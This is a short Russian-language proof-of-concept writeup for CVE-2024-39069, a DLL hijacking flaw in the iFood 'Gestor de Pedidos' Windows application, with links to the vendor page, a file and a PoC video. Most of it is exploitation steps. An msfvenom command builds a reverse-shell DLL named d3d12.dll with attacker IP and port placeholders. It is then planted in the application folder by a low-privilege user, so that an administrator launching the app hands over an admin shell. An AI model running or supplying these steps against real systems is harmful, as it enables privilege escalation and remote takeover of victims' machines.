
CVE-2024-39069
Злоумышленник помещает вредоносную DLL с именем "d3d12.dll" в каталог, который приложение проверяет раньше, чем найдет легитимную "d3d12.dll". При запуске приложения оно загружает вредоносную DLL вместо легитимной, что позволяет злоумышленнику выполнять произвольный код в контексте приложения.
Домашняя страница поставщика: https://gestordepedidos.ifood.com.br/
Google Диск: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
Видео POC: https://youtu.be/oMIobV2M0T8
Создайте вредоносный DLL-файл в Kali Linux с помощью msfvenom
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
Перенесите созданный файл 'd3d12.dll' на хост Windows из Kali с доступом от имени пользователя с низкими привилегиями
Переместите созданный файл 'd3d12.dll' в 'C:\Gestor de Peddios\d3d12.dll' с доступом от имени пользователя с низкими привилегиями
Когда администратор запустит приложение, вы получите обратную оболочку (reverse shell) с правами администратора